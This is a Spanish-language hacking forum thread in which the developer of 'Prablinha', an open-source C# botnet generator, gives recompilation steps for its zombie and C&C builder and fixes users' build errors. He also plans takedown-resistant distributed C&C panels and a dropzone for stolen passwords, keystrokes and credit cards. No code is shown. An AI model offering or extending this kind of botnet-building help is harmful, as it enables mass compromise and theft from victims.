Te ayudaria, pero de C se muy poco, solo de vb6.
si consigues poner esas aztualizaciones y que el bot siga siendo estable, sería una gran botnet de las buenas
PD: en el generador, no te deja poner los suficientes caracteres para el panel, asique no puedo compilar porque no me cabe la URL
Imagen


Un sistema invulnerable es aquel sistema no construido.
Vaya!, si que 'la tienes larga'. El limite está a 49 caracteres, debido al diseño con el que luego se genera el zombie, en donde en los últimos bytes meto una marca de agua y luego 50 bytes para cada atributo de la configuración, encriptada. Tal y como está estructurada, para cambiar el tamaño maximo de la URL debería hacer cambios en la generación del binario y en el modulo de carga de la configuración del zombie, vamos, es algo trivial que ahora mismo voy a hacer. La próxima versión tendrá eso fixeado :)

¡Gracias por los reportes!, de verdad, los agradezco
PGP - https://keyserver2.pgp.com/vkd/DownloadKey.event?keyid=0x9A1286E0DF1FF2A1
Prablinha, generador de botnets OpenSource - http://www.indetectables.net/foro/viewtopic.php?f=7&t=29086
Mis artículos & proyectos - http://itsm3.com/
Ya está echo el cambio, pero no saldrá hasta la proxima update.

De todos modos, como teneis el código, si quereis cambiarlo y compilar una nueva versión os digo lo que debéis hacer:

1º En el proyecto BN (ADN del zombie), cambiar en el archivo /configuracion/Config.cs la linea 46 donde pone 'int offset = 50' por 'int offset = 100'.
2º Compilar el proyecto BN como 'Release'. Se generará el fichero /bin/release/prablinha.exe. Hay que renombrarlo a ADN_3.0 (bueno, o el nombre que se quiera. Esto es unicamente el fichero que se deberá cargar desde el generador de zombies).

3º En el proyecto CnC, ir al fichero Generate.cs y en la linea 125 sustituir 'int offset = 50' por 'int offset = 100'.
4º Modificar la longitud (maxlength) del control 'tbPanel' de 49 a 99.
5º Compilar el CnC y cargar como fichero de ADN el compilado anteriormente en el paso '2º'
PGP - https://keyserver2.pgp.com/vkd/DownloadKey.event?keyid=0x9A1286E0DF1FF2A1
Prablinha, generador de botnets OpenSource - http://www.indetectables.net/foro/viewtopic.php?f=7&t=29086
Mis artículos & proyectos - http://itsm3.com/
inpresionante amigo gracias tio
TheSur escribió:1º En el proyecto BN (ADN del zombie), cambiar en el archivo /configuracion/Config.cs la linea 46 donde pone 'int offset = 50' por 'int offset = 100'.
2º Compilar el proyecto BN como 'Release'. Se generará el fichero /bin/release/prablinha.exe. Hay que renombrarlo a ADN_3.0 (bueno, o el nombre que se quiera. Esto es unicamente el fichero que se deberá cargar desde el generador de zombies).
3º En el proyecto CnC, ir al fichero Generate.cs y en la linea 125 sustituir 'int offset = 50' por 'int offset = 100'.
4º Modificar la longitud (maxlength) del control 'tbPanel' de 49 a 99.
5º Compilar el CnC y cargar como fichero de ADN el compilado anteriormente en el paso '2º'
Lo dice como lo mas normal del mundo xD jaja te admiro, increible tu proyecto
A mí me da el mismo error que a ddossecure, del "manifest signing certificate"
Imagen


Un sistema invulnerable es aquel sistema no construido.
Es extraño, he estado buscando información de este error y le pasa a bastantes usuarios al pasar un proyecto de un equipo a otro. A mi esto nunca me había pasado, y me resulta extraño porque no firmo ninguno de los binarios a la hora de compilarlos.

En esta página dan algunas soluciones: [Enlace externo eliminado para invitados] ... 8044e54421

Una de ellas dice 'To solve, I went to the "Signing" tab of the project properties and unchecked "Sign the ClickOnce manifests".
'Ir a las propiedades del proyecto, y a la pestaña de "signing" o "Firma", y allí deshabilitar la propiedad de "firmar los manifiestos de clickonce" o "sign the clickonce manifests"'.

Seguiré buscando el motivo del problema para que no vuelva a pasar en la proxima update :)

PD: ¿Me podeis confirmar si a los que os ha dado error usáis todos el visual studio 2010?, la versión en la que lo he desarrollado es la 2008.
PD2: @ddossecure, la excepción que se te produce es porque estás depurando y el fichero cnc.pdb está en uso, lo mas probable es que sea porque has ejecutado el vshost.exe (o eso veo en tu barra de inicio). Ese ejecutable no debes abrirlo, es parte de los archivos que utiliza el visual studio internamente para depurar.

EDITADO:
@ddossecure, esa excepción te pasa porque has cargado el fichero 'cnc.pdb' como el ADN para generar el zombie. Ese no es el fichero que debes cargar!! ;). Debes hacerlo con el DNA_3.0rc o el que te compiles en el proyecto del zombie (que se genera como prablinha.exe) el cual debes renombrar a DNA_3.0rc (aunque esto no es necesario). Está explicado en uno de los ultimos posts que escribí aqui sobre como cambiar la longitud de la URL y como compilarlo
PGP - https://keyserver2.pgp.com/vkd/DownloadKey.event?keyid=0x9A1286E0DF1FF2A1
Prablinha, generador de botnets OpenSource - http://www.indetectables.net/foro/viewtopic.php?f=7&t=29086
Mis artículos & proyectos - http://itsm3.com/
hola, disculpa , soy nuevo en el tema, pero ya me he montado prablinha en mi ordenador, pero no he entendio bien como generar un zombi, ya que en el manual pones que se necesita el programa c&c.exe y ese programa no lo encuentro dentro del zip que me has enviado, solo hay archivos con extension cs ..... espero me puedas contestar ya que quisera hacer pruebas internas y a la par poder ver el codigo funete y ver si puedo tunearlo un poco gracias
Hola Dani, el C&C.exe está en 'src zombie y generador [c#]/CnC/bin/Release/CnC.exe', y en la misma ruta está el fichero de 'ADN' (ADN_3.0b_RC). Cualquier duda o problema con la generación del zombie o montaje de la botnet, me escribes aqui o por PM

Saludos!
PGP - https://keyserver2.pgp.com/vkd/DownloadKey.event?keyid=0x9A1286E0DF1FF2A1
Prablinha, generador de botnets OpenSource - http://www.indetectables.net/foro/viewtopic.php?f=7&t=29086
Mis artículos & proyectos - http://itsm3.com/
Muchas gracias, excelente trabajo, probaremos a ver que tal va, saludos
Pues hoy he leído el post de Chema Alonso, y por eso llego hasta aquí, agradezco que hayas compartido tu source con nosotros, pero agradezco más que te hayas decidido programar en C#, siempre he querido saber cual es la manera adecuada de realizar las cosas en .NET, supongo que como vos sois de I64 pues el código ha de estar majo y se puede aprender de el.

¡Saludos, mil gracias!
Hola.


He visto que a la hora de crear el zombie, le asignas por defecto una ip para el c&c. He pensado que una posible mejora sería recoger de algún sitio (vease web) una lista de posibles c&c (imagina que tienes 2 maquinas y te cogen una, estaria genial poder "redirigir" el trafico al servidor que este online), el control de los bots por twiter, o comandos escondidos en comentarios de paginas web... nose, se me ocurren 1000 cosas.


Estoy a la espera de un portatil en condiciones porque el mio a muerto. En cuanto me llegue, monto de nuevo el VS 2008, añado unas cosillas más que tengo pensadas y te las paso por privado a ver que te parece, ok?


Un saludo.
@xhushito:
¡Yo te agradezco a ti tu interés!, espero que si decides 'leer' el código te sirva de utilidad.

@Nomore:
Estoy trabajando en una nueva versión de prablinha y ya contemplé lo que me comentas. Mi idea es que al crear un zombie se le puedan indicar varios paneles de C&C (en distintos servidores). Cada uno de estos C&C se conectarán a una misma base de datos MySQL por lo cual es como si fuera el mismo C&C pero de forma distribuida.

El zombie una vez ejecutado, elegirá un C&C de los disponibles de forma aleatoria. Sobre ese C&C se realizarán las peticiones, pero como comparten la misma base de datos, será igualmente válido si el 'master' administra la botnet desde otro panel.

De este modo, si tumban un servidor en donde hay un C&C alojado, no habría ningún problema, aun estarían disponibles el resto de paneles C&C y habría tiempo más que suficiente para montar un nuevo panel y actualizar los zombies de la botnet.

Por otro lado, una de las novedades que traerá la nueva versión será una 'dropzone' mediante la cual los zombies podrán subir ficheros al panel de C&C. Esto puede dar mucho juego y ser utilizado por el 'master' para el uso que le de la gana, como por ejemplo obtener las pulsaciones del teclado, passwords, tarjetas de crédito, fotos, capturas de pantalla... o lo que se quiera. Esta es una de las novedades... ¡hay más!

También te agradezco mucho que quieras colaborar, realmente me haría mucha ilusión que alguien mostrara interés por el proyecto y decidiera aportar su grano de arena. Cualquier colaboración, idea, o si necesitas ayuda para el desarrollo, puedes contactarme por PM o por mi dirección de correo.
PGP - https://keyserver2.pgp.com/vkd/DownloadKey.event?keyid=0x9A1286E0DF1FF2A1
Prablinha, generador de botnets OpenSource - http://www.indetectables.net/foro/viewtopic.php?f=7&t=29086
Mis artículos & proyectos - http://itsm3.com/
#TheSur

En cuanto tenga operativo mi nuevo portatil, instalo las herramientas que suelo utilizar para programación, reversing y demás. Yo calculo que tardaré de 3 a 4 días en estudiar y comprender el código de tu aplicación, una vez lo tenga estudiado, te pasaré por email una serie de "mejoras" o "updates" que creo que te van a gustar.


Lo dicho, en cuanto tenga mi equipo preparado, a darle caña ;).



Un saludo!
Ayer recibí mi preciado portatil, al fin!!!. A lo largo de esta semana me miro el codigo y te paso lo que te comente, ok?


Salu2!!
Cerrado

Volver a “Troyanos y Herramientas”